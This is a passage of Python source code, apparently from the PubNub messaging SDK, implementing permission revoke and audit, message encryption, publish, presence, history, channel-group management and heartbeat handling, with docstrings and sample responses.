callback=None, error=None):
"""Method for revoking permissions.
Args:
channel: (string) (optional)
Specifies channel name to revoke permissions to.
If channel/channel_group is not specified, the revoke
applies to all channels associated with the
subscribe_key. If auth_key is not specified, it is
possible to revoke permissions from multiple channels
simultaneously by specifying the channels as a comma
separated list.
channel_group: (string) (optional)
Specifies channel group name to revoke permissions to.
If channel/channel_group is not specified, the revoke
applies to all channels associated with the
subscribe_key. If auth_key is not specified, it is
possible to revoke permissions to multiple channel
groups simultaneously by specifying the channel groups
as a comma separated list.
auth_key: (string) (optional)
Specifies auth_key to revoke permissions to.
It is possible to specify multiple auth_keys as comma
separated list in combination with a single channel
name. If auth_key is provided as the special-case
value "null" (or included in a comma-separated list,
eg. "null,null,abc"), a new auth_key will be generated
and returned for each "null" value.
ttl: (int) (default: 1)
Time in minutes for which the updated permissions
are valid. Max is 525600, min is 1.
Setting ttl to 0 will apply the change indefinitely.
callback: (function) (optional)
A callback method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (function) (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Returns a dict in sync mode i.e. when callback argument is not
given.
The dict returned contains values with keys 'message' and 'payload'
Sample Response:
{
"message":"Success",
"payload":{
"ttl":5,
"auths":{
"my_authkey":{"r":0,"w":0}
},
"subscribe_key":"my_subkey",
"level":"user",
"channel":"my_channel"
}
}
"""
return self._pam_auth({
'channel': channel,
'channel-group': channel_group,
'auth': auth_key,
'r': 0,
'w': 0,
'ttl': ttl,
'pnsdk': self.pnsdk
}, callback=callback, error=error)
def audit(self, channel=None, channel_group=None, auth_key=None,
callback=None, error=None):
"""Method for fetching permissions from pubnub servers.
This method provides a mechanism to reveal existing PubNub Access
Manager attributes for any combination of subscribe_key, channel
and auth_key.
Args:
channel: (string) (optional)
Specifies channel name to return PAM
attributes optionally in combination with auth_key.
If channel/channel_group is not specified, results
for all channels associated with subscribe_key are
returned. If auth_key is not specified, it is possible
to return results for a comma separated list of
channels.
channel_group: (string) (optional)
Specifies channel group name to return PAM
attributes optionally in combination with auth_key.
If channel/channel_group is not specified, results
for all channels associated with subscribe_key are
returned. If auth_key is not specified, it is possible
to return results for a comma separated list of
channels.
auth_key: (string) (optional)
Specifies the auth_key to return PAM attributes for.
If only a single channel is specified, it is possible
to return results for a comma separated list of
auth_keys.
callback: (function) (optional)
A callback method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (function) (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Returns a dict in sync mode i.e. when callback argument is not
given
The dict returned contains values with keys 'message' and 'payload'
Sample Response
{
"message":"Success",
"payload":{
"channels":{
"my_channel":{
"auths":{"my_ro_authkey":{"r":1,"w":0},
"my_rw_authkey":{"r":0,"w":1},
"my_admin_authkey":{"r":1,"w":1}
}
}
},
}
Usage:
pubnub.audit('my_channel')  # sync mode
"""
return self._pam_auth({
'channel': channel,
'channel-group': channel_group,
'auth': auth_key,
'pnsdk': self.pnsdk
}, 1, callback=callback, error=error)
def encrypt(self, message):
"""Method for encrypting data.
This method takes plaintext as input and returns encrypted data.
This need not be called directly, as encryption/decryption is
handled transparently by the Pubnub class if a cipher key is
provided when the pubnub object is initialized.
Args:
message: Message to be encrypted.
Returns:
Returns encrypted message if cipher key is set
"""
if self.cipher_key:
message = json.dumps(self.pc.encrypt(
self.cipher_key, json.dumps(message)).replace('\n', ''))
else:
message = json.dumps(message)
return message
def decrypt(self, message):
"""Method for decrypting data.
This method takes ciphertext as input and returns decrypted data.
This need not be called directly, as encryption/decryption is
handled transparently by the Pubnub class if a cipher key is
provided when the pubnub object is initialized.
Args:
message: Message to be decrypted.
Returns:
Returns decrypted message if cipher key is set
"""
if self.cipher_key:
message = self.pc.decrypt(self.cipher_key, message)
return message
def _return_wrapped_callback(self, callback=None):
def _new_format_callback(response):
if self.http_debug is not None:
self.http_debug(response)
if 'payload' in response:
if (callback is not None):
callback_data = dict()
callback_data['payload'] = response['payload']
if 'message' in response:
callback_data['message'] = response['message']
if (callback is not None):
callback(callback_data)
else:
if (callback is not None):
callback(response)
if (callback is not None):
return _new_format_callback
else:
return None
def leave_channel(self, channel, callback=None, error=None):
## Send leave
return self._request({"urlcomponents": [
'v2', 'presence',
'sub_key',
self.subscribe_key,
'channel',
channel,
'leave'
], 'urlparams':
{'auth': self.auth_key, 'pnsdk': self.pnsdk, "uuid": self.uuid, }},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def leave_group(self, channel_group, callback=None, error=None):
## Send leave
return self._request({"urlcomponents": [
'v2', 'presence',
'sub_key',
self.subscribe_key,
'channel',
',',
'leave'
], 'urlparams':
{'auth': self.auth_key, 'pnsdk': self.pnsdk,
'channel-group': channel_group,
"uuid": self.uuid, }},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def publish(self, channel, message, callback=None, error=None):
"""Publishes data on a channel.
The publish() method is used to send a message to all subscribers of
a channel. To publish a message you must first specify a valid
publish_key at initialization. A successfully published message is
replicated across the PubNub Real-Time Network and sent simultaneously
to all subscribed clients on a channel. Messages in transit can be
secured from potential eavesdroppers with SSL/TLS by setting ssl to
True during initialization.
Published messages can also be encrypted with AES-256 simply by
specifying a cipher_key during initialization.
Args:
channel: (string)
Specifies channel name to publish messages to.
message: (string/int/double/dict/list)
Message to be published
callback: (optional)
A callback method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode : list
Async Mode : None
The function returns the following formatted response:
[ Number, "Status", "Time Token"]
The output below demonstrates the response to a successful call:
[1,"Sent","13769558699541401"]
"""
message = self.encrypt(message)
## Send Message
return self._request({"urlcomponents": [
'publish',
self.publish_key,
self.subscribe_key,
'0',
channel,
'0',
message
], 'urlparams': {'auth': self.auth_key, 'pnsdk': self.pnsdk}},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
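# Illustrative usage ('my_channel' is a placeholder):
#
#   pubnub.publish('my_channel', {'text': 'hello'})          # sync
#   pubnub.publish('my_channel', 'hello',
#                  callback=on_ok, error=on_err)             # async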
def presence(self, channel, callback, error=None, connect=None,
disconnect=None, reconnect=None):
"""Subscribe to presence events on a channel.
Only works in async mode
Args:
channel: Channel name ( string ) on which to listen for events
callback: A callback method should be passed as parameter.
If passed, the api works in async mode.
Required argument when working with twisted or tornado.
error: Optional variable.
An error method can be passed as
parameter. If set, the api works in async mode.
Returns:
None
"""
return self.subscribe(channel + '-pnpres', callback=callback,
error=error, connect=connect,
disconnect=disconnect,
reconnect=reconnect)
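# Under the hood this is just a subscribe to the companion presence
# channel, e.g. presence on 'my_channel' listens on 'my_channel-pnpres'.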
def presence_group(self, channel_group, callback, error=None,
connect=None, disconnect=None, reconnect=None):
"""Subscribe to presence events on a channel group.
Only works in async mode
Args:
channel_group: Channel group name ( string )
callback: A callback method should be passed to the method.
If passed, the api works in async mode.
Required argument when working with twisted or tornado.
error: Optional variable. An error method can be passed as
parameter.
If passed, the api works in async mode.
Returns:
None
"""
return self.subscribe_group(channel_group + '-pnpres',
callback=callback, error=error,
connect=connect,
disconnect=disconnect,
reconnect=reconnect)
def state(self, channel=None, channel_group=None, uuid=None, state=None,
callback=None, error=None):
"""Get/Set state data.
The state API is used to set key/value pairs specific to a subscriber
uuid.
State information is supplied as a dict of key/value pairs.
Args:
state: (dict) (optional)
Key/value pairs to set as state for the uuid on the
given channel/channel_group. If omitted, the current
state is returned instead of being set.
uuid: (string) (optional)
The subscriber uuid to set state for or get current
state from.
Default is current uuid.
channel: (string) (optional)
Specifies the channel for which state is to be
set/get.
channel_group: (string) (optional)
Specifies the channel_group for which state is to
be set/get.
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to
the method. If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: Object
Async Mode: None
Response Format:
The state API returns a JSON object containing key value pairs.
Example Response:
{
first : "Robert",
last : "Plant",
age : 59,
region : "UK"
}
"""
data = {'auth': self.auth_key, 'pnsdk': self.pnsdk}
try:
if (channel and self.subscriptions[channel] and
self.subscriptions[channel].subscribed and
state is not None):
self.STATE[channel] = state
except KeyError:
pass
if channel_group and state is not None:
try:
if (self.subscription_groups[channel_group] and
self.subscription_groups[channel_group].subscribed):
self.STATE[channel_group] = state
except KeyError:
pass
data['channel-group'] = channel_group
if channel is None or len(channel) == 0:
channel = ','  # ',' acts as the placeholder/wildcard channel
if uuid is None:
uuid = self.uuid
if state is not None:
data['state'] = json.dumps(state)
urlcomponents = [
'v2', 'presence',
'sub-key', self.subscribe_key,
'channel', channel,
'uuid', uuid,
'data'
]
else:
urlcomponents = [
'v2', 'presence',
'sub-key', self.subscribe_key,
'channel', channel,
'uuid', uuid
]
## Get Presence Here Now
return self._request({"urlcomponents": urlcomponents,
'urlparams': data},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
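# Illustrative usage (placeholder names; sync mode shown):
#
#   pubnub.state(channel='my_channel', state={'mood': 'grumpy'})  # set
#   pubnub.state(channel='my_channel', uuid='some-uuid')          # get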
def where_now(self, uuid=None, callback=None, error=None):
"""Get where now data.
You can obtain the list of channels to which a uuid is currently
subscribed by calling the where_now() function in your application.
Args:
uuid: (optional)
Specifies the uuid to return channel list for.
Default is current uuid.
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: list
Async Mode: None
Response Format:
The where_now() method returns a list of channels to which
uuid is currently subscribed.
channels:["String","String", ... ,"String"] - List of Channels
uuid is currently subscribed to.
Example Response:
{
"channels":
[
"lobby",
"game01",
"chat"
]
}
"""
urlcomponents = [
'v2', 'presence',
'sub_key', self.subscribe_key,
'uuid'
]
if (uuid is not None and len(uuid) > 0):
urlcomponents.append(uuid)
else:
urlcomponents.append(self.uuid)
data = {'auth': self.auth_key, 'pnsdk': self.pnsdk}
## Get Presence Where Now
return self._request({"urlcomponents": urlcomponents,
'urlparams': data},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def here_now(self, channel, uuids=True, state=False,
callback=None, error=None):
"""Get here now data.
You can obtain information about the current state of a channel
including a list of unique user-ids currently subscribed to the
channel and the total occupancy count of the channel by calling
the here_now() function in your application.
Args:
channel: (string) (optional)
Specifies the channel name to return occupancy
results. If channel is not provided, here_now will
return data for all channels.
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: list
Async Mode: None
Response Format:
The here_now() method returns a list of uuids currently
subscribed to the channel.
uuids:["String","String", ... ,"String"] - List of UUIDs currently
subscribed to the channel.
occupancy: Number - Total current occupancy of the channel.
Example Response:
{
occupancy: 4,
uuids: [
'123123234t234f34fq3dq',
'143r34f34t34fq34q34q3',
'23f34d3f4rq34r34rq23q',
'w34tcw45t45tcw435tww3',
]
}
"""
urlcomponents = [
'v2', 'presence',
'sub_key', self.subscribe_key
]
if (channel is not None and len(channel) > 0):
urlcomponents.append('channel')
urlcomponents.append(channel)
data = {'auth': self.auth_key, 'pnsdk': self.pnsdk}
if state is True:
data['state'] = '1'
if uuids is False:
data['disable_uuids'] = '1'
## Get Presence Here Now
return self._request({"urlcomponents": urlcomponents,
'urlparams': data},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
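# Illustrative usage ('my_channel' is a placeholder):
#
#   pubnub.here_now('my_channel')                    # uuids + occupancy
#   pubnub.here_now('my_channel', uuids=False)       # occupancy only
#   pubnub.here_now('my_channel', state=True)        # include user state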
def history(self, channel, count=100, reverse=False,
start=None, end=None, include_token=False, callback=None,
error=None):
"""This method fetches historical messages of a channel.
PubNub Storage/Playback Service provides real-time access to an
unlimited history for all messages published to PubNub. Stored
messages are replicated across multiple availability zones in several
geographical data center locations. Stored messages can be encrypted
with AES-256 message encryption ensuring that they are not readable
while stored on PubNub's network.
It is possible to control how messages are returned and in what order,
for example you can:
Return messages in the order newest to oldest (default behavior).
Return messages in the order oldest to newest by setting reverse
to true.
Page through results by providing a start or end time token.
Retrieve a "slice" of the time line by providing both a start
and end time token.
Limit the number of messages to a specific quantity using
the count parameter.
Args:
channel: (string)
Specifies channel to return history messages from
count: (int) (default: 100)
Specifies the number of historical messages to return
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Returns a list in sync mode i.e. when callback argument is not
given
Sample Response:
[["Pub1","Pub2","Pub3","Pub4","Pub5"],
13406746729185766,13406746845892666]
"""
def _get_decrypted_history(resp):
try:
if (resp is not None and isinstance(resp, list) and
resp[1] is not None and self.cipher_key):
msgs = resp[0]
for i in range(0, len(msgs)):
msgs[i] = self.decrypt(msgs[i])
except KeyError:
pass
return resp
def _history_callback(resp):
if callback is not None:
callback(_get_decrypted_history(resp))
if callback is None:
history_cb = None
else:
history_cb = _history_callback
params = dict()
params['count'] = count
params['reverse'] = reverse
params['start'] = start
params['end'] = end
params['auth'] = self.auth_key
params['pnsdk'] = self.pnsdk
params['include_token'] = 'true' if include_token else 'false'
## Get History
return _get_decrypted_history(self._request({'urlcomponents': [
'v2',
'history',
'sub-key',
self.subscribe_key,
'channel',
channel,
], 'urlparams': params},
callback=self._return_wrapped_callback(history_cb),
error=self._return_wrapped_callback(error)))
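# Illustrative usage sketch (placeholder channel name; the start timetoken
# is taken from the sample response above):
#
#   # Last 10 messages, newest to oldest (default ordering)
#   print(pubnub.history(channel='lobby', count=10))
#   # Oldest to newest from a start timetoken, with timetokens attached
#   pubnub.history(channel='lobby', reverse=True,
#                  start=13406746729185766, include_token=True,
#                  callback=lambda resp: print(resp),
#                  error=lambda err: print(err))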
def time(self, callback=None):
"""This function will return a 17 digit precision Unix epoch.
Args:
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Returns a 17 digit number in sync mode i.e. when callback
argument is not given
Sample:
13769501243685161
"""
time = self._request({'urlcomponents': [
'time',
'0'
]}, callback)
# in async mode _request returns an abort handle rather than the
# response, so only index into the result on the sync path
if callback is None and time is not None:
return time[0]
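# Illustrative usage sketch:
#
#   timetoken = pubnub.time()           # sync: e.g. 13769501243685161
#   pubnub.time(lambda t: print(t[0]))  # async: raw [timetoken] list goes
#                                       # to the callback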
def _encode(self, request):
return [
"".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and
hex(ord(ch)).replace('0x', '%').upper() or
ch for ch in list(bit)
]) for bit in request]
def _encode_param(self, val):
return "".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and
hex(ord(ch)).replace('0x', '%').upper() or
ch for ch in list(val)])
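# For example (illustration only): characters in the reserved set above are
# replaced by their uppercase percent-escapes, everything else passes through:
#
#   self._encode_param('hello world/?')  ->  'hello%20world%2F%3F'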
def _encode_pam(self, val):
return val
def getUrl(self, request, encoder_map=None):
if self.u is True and "urlparams" in request:
request['urlparams']['u'] = str(random.randint(1, 100000000000))
## Build URL
url = self.origin + '/' + "/".join([
"".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and
hex(ord(ch)).replace('0x', '%').upper() or
ch for ch in list(bit)
]) for bit in request["urlcomponents"]])
if ("urlparams" in request):
url = url + '?' + "&".join(
[x + "=" + (self._encode_param(str(y))
if encoder_map is None or
x not in encoder_map else encoder_map[x](str(y)))
for x, y in request[
"urlparams"].items() if y is not None and
len(str(y)) > 0])
if self.http_debug is not None:
self.http_debug(url)
return url
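# Illustrative sketch of the URL getUrl produces (component values are
# placeholders; <origin> stands for whatever self.origin was set to):
#
#   pubnub.getUrl({'urlcomponents': ['v2', 'presence', 'sub_key', 'demo',
#                                    'uuid', 'user 1'],
#                  'urlparams': {'auth': 'abc'}})
#   # -> '<origin>/v2/presence/sub_key/demo/uuid/user%201?auth=abc'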
def _channel_registry(self, url=None, params=None, callback=None,
error=None):
if (params is None):
params = dict()
urlcomponents = ['v1', 'channel-registration', 'sub-key',
self.subscribe_key]
if (url is not None):
urlcomponents += url
params['auth'] = self.auth_key
params['pnsdk'] = self.pnsdk
## Channel Registry
return self._request({'urlcomponents': urlcomponents,
'urlparams': params},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def _channel_group(self, channel_group=None, channels=None, cloak=None,
mode='add', callback=None, error=None):
params = dict()
url = []
namespace = None
if (channel_group is not None and len(channel_group) > 0):
ns_ch_a = channel_group.split(':')
if len(ns_ch_a) > 1:
namespace = None if ns_ch_a[0] == '*' else ns_ch_a[0]
channel_group = ns_ch_a[1]
else:
channel_group = ns_ch_a[0]
if (namespace is not None):
url.append('namespace')
url.append(self._encode(namespace))
url.append('channel-group')
if channel_group is not None and channel_group != '*':
url.append(channel_group)
if (channels is not None):
if (type(channels) is list):
channels = ','.join(channels)
params[mode] = channels
#params['cloak'] = 'true' if CLOAK is True else 'false'
else:
if mode == 'remove':
url.append('remove')
return self._channel_registry(url=url, params=params,
callback=callback, error=error)
def channel_group_list_namespaces(self, callback=None, error=None):
"""Get list of namespaces.
You can obtain the list of namespaces for the subscribe key associated
with the PubNub object using this method.
Args:
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_list_namespaces method returns a dict which
contains list of namespaces in payload field
{
u'status': 200,
u'payload': {
u'sub_key': u'demo',
u'namespaces': [u'dev', u'foo']
},
u'service': u'channel-registry',
u'error': False
}
Async Mode: None (callback gets the response as parameter)
Response Format:
The callback passed to channel_group_list_namespaces gets a
dict containing the list of namespaces under the payload field
{
u'payload': {
u'sub_key': u'demo',
u'namespaces': [u'dev', u'foo']
}
}
namespaces is the list of namespaces for the given subscribe key
"""
url = ['namespace']
return self._channel_registry(url=url, callback=callback, error=error)
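# Illustrative usage sketch (namespace name is a placeholder;
# channel_group_remove_namespace is defined just below):
#
#   print(pubnub.channel_group_list_namespaces())
#   # e.g. {u'status': 200, u'payload': {u'sub_key': u'demo',
#   #                                    u'namespaces': [u'dev', u'foo']}, ...}
#   pubnub.channel_group_remove_namespace('dev',
#                                         callback=lambda r: print(r),
#                                         error=lambda e: print(e))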
def channel_group_remove_namespace(self, namespace, callback=None,
error=None):
"""Remove a namespace.
A namespace can be deleted using this method.
Args:
namespace: (string) namespace to be deleted
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to
the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_remove_namespace method returns a dict indicating
status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_remove_namespace gets a
dict indicating the status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
"""
url = ['namespace', self._encode(namespace), 'remove']
return self._channel_registry(url=url, callback=callback, error=error)
def channel_group_list_groups(self, namespace=None, callback=None,
error=None):
"""Get list of groups.
Using this method, the list of groups for the subscribe key
associated with the PubNub object can be obtained. If a namespace is
provided, only groups within that namespace are listed.
Args:
namespace: (string) (optional) namespace
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to
the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_list_groups method returns a dict which contains
list of groups in payload field
{
u'status': 200,
u'payload': {"namespace": "dev", "groups": ["abcd"]},
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_list_groups gets a
dict containing the list of groups under the payload field
{
u'payload': {"namespace": "dev", "groups": ["abcd"]}
}
"""
if (namespace is not None and len(namespace) > 0):
channel_group = namespace + ':*'
else:
channel_group = '*:*'
return self._channel_group(channel_group=channel_group,
callback=callback, error=error)
def channel_group_list_channels(self, channel_group,
callback=None, error=None):
"""Get list of channels for a group.
Using this method, the list of channels for a group can be obtained.
Args:
channel_group: (string)
Channel Group name. It can also contain namespace.
If namespace is also specified, then the parameter
will be in format namespace:channel_group
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to the
method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_list_channels method returns a dict which contains
list of channels in payload field
{
u'status': 200,
u'payload': {"channels": ["hi"], "group": "abcd"},
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_list_channels gets a
dict containing the list of channels under the payload field
{
u'payload': {"channels": ["hi"], "group": "abcd"}
}
"""
return self._channel_group(channel_group=channel_group,
callback=callback, error=error)
def channel_group_add_channel(self, channel_group, channel,
callback=None, error=None):
"""Add a channel to group.
A channel can be added to group using this method.
Args:
channel_group: (string)
Channel Group name. It can also contain namespace.
If namespace is also specified, then the parameter
will be in format namespace:channel_group
channel: (string)
Can be a channel name, a list of channel names,
or a comma separated list of channel names
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to
the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_add_channel method returns a dict indicating
status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_add_channel gets a
dict indicating the status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
"""
return self._channel_group(channel_group=channel_group,
channels=channel, mode='add',
callback=callback, error=error)
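# Illustrative usage sketch (group/channel names are placeholders; the
# 'namespace:group' form follows the docstring above):
#
#   pubnub.channel_group_add_channel('dev:abcd', 'hi')
#   pubnub.channel_group_add_channel('abcd', ['ch1', 'ch2'])  # list form
#   print(pubnub.channel_group_list_channels('dev:abcd'))
#   # e.g. {u'status': 200,
#   #       u'payload': {u'channels': [u'hi'], u'group': u'abcd'}, ...}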
def channel_group_remove_channel(self, channel_group, channel,
callback=None, error=None):
"""Remove channel.
A channel can be removed from a group using this method.
Args:
channel_group: (string)
Channel Group name. It can also contain namespace.
If namespace is also specified, then the parameter
will be in format namespace:channel_group
channel: (string)
Can be a channel name, a list of channel names,
or a comma separated list of channel names
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_remove_channel method returns a dict indicating
status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_remove_channel gets a
dict indicating the status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
"""
return self._channel_group(channel_group=channel_group,
channels=channel, mode='remove',
callback=callback, error=error)
def channel_group_remove_group(self, channel_group,
callback=None, error=None):
"""Remove channel group.
A channel group can be removed using this method.
Args:
channel_group: (string)
Channel Group name. It can also contain namespace.
If namespace is also specified, then the parameter
will be in format namespace:channel_group
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_remove_group method returns a dict indicating
status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_remove_group gets a
dict indicating the status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
"""
return self._channel_group(channel_group=channel_group,
mode='remove', callback=callback,
error=error)
class EmptyLock():
def __enter__(self):
pass
def __exit__(self, a, b, c):
pass
empty_lock = EmptyLock()
class PubnubCoreAsync(PubnubBase):
def start(self):
pass
def stop(self):
pass
def nop(self):
pass
def __init__(
self,
publish_key,
subscribe_key,
secret_key=None,
cipher_key=None,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None,
_tt_lock=empty_lock,
_channel_list_lock=empty_lock,
_channel_group_list_lock=empty_lock
):
super(PubnubCoreAsync, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid
)
self.subscriptions = {}
self.subscription_groups = {}
self.timetoken = 0
self.last_timetoken = 0
self.accept_encoding = 'gzip'
self.SUB_RECEIVER = None
self._connect = None
self._tt_lock = _tt_lock
self._channel_list_lock = _channel_list_lock
self._channel_group_list_lock = _channel_group_list_lock
self._connect = lambda: None
self.u = None
self.heartbeat = 0
self.heartbeat_interval = 0
self.heartbeat_running = False
self.heartbeat_stop_flag = False
self.abort_heartbeat = self.nop
self.heartbeat_callback = self.nop
self.heartbeat_error = self.nop
def get_channel_list(self, channels, nopresence=False):
channel = ''
first = True
with self._channel_list_lock:
for ch in channels:
if nopresence is True and ch.find("-pnpres") >= 0:
continue
if not channels[ch]['subscribed']:
continue
if not first:
channel += ','
else:
first = False
channel += ch
return channel
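# Sketch of the expected input/output shape (illustration only; output
# order follows dict iteration order):
#
#   subs = {'a':        {'subscribed': True},
#           'b-pnpres': {'subscribed': True},
#           'c':        {'subscribed': False}}
#   self.get_channel_list(subs)                   # -> 'a,b-pnpres'
#   self.get_channel_list(subs, nopresence=True)  # -> 'a'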
def get_channel_group_list(self, channel_groups, nopresence=False):
channel_group = ''
first = True
with self._channel_group_list_lock:
for ch in channel_groups:
if nopresence is True and ch.find("-pnpres") >= 0:
continue
if not channel_groups[ch]['subscribed']:
continue
if not first:
channel_group += ','
else:
first = False
channel_group += ch
return channel_group
def get_channel_array(self, nopresence=False):
"""Get List of currently subscribed channels
Returns:
Returns a list containing names of channels subscribed
Sample return value:
["a","b","c]
"""
channels = self.subscriptions
channel = []
with self._channel_list_lock:
for ch in channels:
if nopresence is True and ch.find("-pnpres") >= 0:
continue
if not channels[ch]['subscribed']:
continue
channel.append(ch)
return channel
def get_channel_group_array(self, nopresence=False):
"""Get List of currently subscribed channel groups
Returns:
Returns a list containing names of channel groups subscribed
Sample return value:
["a","b","c]
"""
channel_groups = self.subscription_groups
channel_group = []
with self._channel_group_list_lock:
for ch in channel_groups:
if nopresence is True and ch.find("-pnpres") >= 0:
continue
if not channel_groups[ch]['subscribed']:
continue
channel_group.append(ch)
return channel_group
def each(l, func):
if func is None:
return
for i in l:
func(i)
def restart_heartbeat(self):
self.stop_heartbeat()
self.start_heartbeat()
def stop_heartbeat(self):
self.abort_heartbeat()
self.heartbeat_running = False
self.heartbeat_stop_flag = False
def start_heartbeat(self):
if self.heartbeat_running is True:
return
self._presence_heartbeat()
def _presence_heartbeat(self):
if (self.heartbeat_interval is None or self.heartbeat_interval > 500 or
self.heartbeat_interval < 1):
self.heartbeat_stop_flag = True
if (len(self.get_channel_list(self.subscriptions, True)) == 0 and
len(self.get_channel_group_list(self.subscription_groups, True))
== 0):
self.heartbeat_stop_flag = True
if self.heartbeat_stop_flag is True:
self.heartbeat_running = False
self.heartbeat_stop_flag = False
return
def _callback(resp):
if self.heartbeat_callback is not None:
self.heartbeat_callback(resp)
self.abort_heartbeat = self.timeout(
self.heartbeat_interval, self._presence_heartbeat)
def _error(resp):
if self.heartbeat_error is not None:
self.heartbeat_error(resp)
self.abort_heartbeat = self.timeout(
self.heartbeat_interval, self._presence_heartbeat)
self.heartbeat_running = True
self.presence_heartbeat(_callback, _error)
def set_heartbeat(self, heartbeat, callback=None, error=None):
self.heartbeat = heartbeat
self.heartbeat_interval = (self.heartbeat / 2) - 1
if self.heartbeat == 2:
self.heartbeat_interval = 1
self.restart_heartbeat()
with self._tt_lock:
self.last_timetoken = self.timetoken if self.timetoken != 0 \
else self.last_timetoken
self.timetoken = 0
self._connect()
self.heartbeat_callback = callback
self.heartbeat_error = error
def get_heartbeat(self):
return self.heartbeat
def set_heartbeat_interval(self, heartbeat_interval):
self.heartbeat_interval = heartbeat_interval
self.start_heartbeat()
def get_heartbeat_interval(self):
return self.heartbeat_interval
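# Worked example of the interval rule in set_heartbeat above (illustrative):
#
#   pubnub.set_heartbeat(60)  # interval = 60/2 - 1 = 29 s between pings
#   pubnub.set_heartbeat(2)   # special-cased to a 1 s interval
#   pubnub.get_heartbeat_interval()  # -> 1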
def presence_heartbeat(self, callback=None, error=None):
data = {'auth': self.auth_key, 'pnsdk': self.pnsdk,
'uuid': self.uuid}
st = json.dumps(self.STATE)
if len(st) > 2:
data['state'] = st
channels = self.get_channel_list(self.subscriptions, True)
channel_groups = self.get_channel_group_list(
self.subscription_groups, True)
if channels is None:
channels = ','
